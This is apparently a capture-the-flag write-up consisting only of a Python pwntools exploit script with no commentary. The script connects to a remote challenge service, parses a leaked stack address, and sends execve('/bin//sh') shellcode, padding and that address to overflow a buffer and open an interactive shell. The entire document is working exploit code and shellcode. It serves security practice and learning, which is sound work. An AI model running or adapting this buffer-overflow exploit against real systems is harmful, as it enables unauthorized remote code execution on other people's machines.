Rating:

```
#!/usr/bin/env python3

from pwn import *

r = remote("52.59.124.14",10020)
shellcode = b'\xbc\x90H@\x00\xb8;\x00\x00\x00j\x00H\xbb/bin//shSH\x89\xe7\xbe\x00\x00\x00\x00\xba\x00\x00\x00\x00\x0f\x05'
r.recvuntil(b"Your game slot is at: ")
leak = int(r.recvline().strip(),16)
exploit = shellcode + b'A' * 482 + p64(leak)
r.sendline(exploit)
r.interactive()
```